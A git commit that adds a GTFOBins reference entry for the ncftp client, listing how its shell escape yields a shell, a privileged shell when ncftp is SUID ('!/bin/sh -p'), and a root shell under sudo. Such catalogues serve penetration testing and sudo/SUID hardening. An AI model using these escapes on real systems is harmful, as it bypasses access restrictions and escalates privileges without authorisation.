Add ncftp

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Miguel R
2023-03-19 12:14:10 +01:00
committed by GitHub
parent f9e3d84596
commit 53b09bd16a

15
_gtfobins/ncftp.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
ncftp
!/bin/sh
suid:
- code: |
./ncftp
!/bin/sh -p
sudo:
- code: |
sudo ncftp
!/bin/sh
---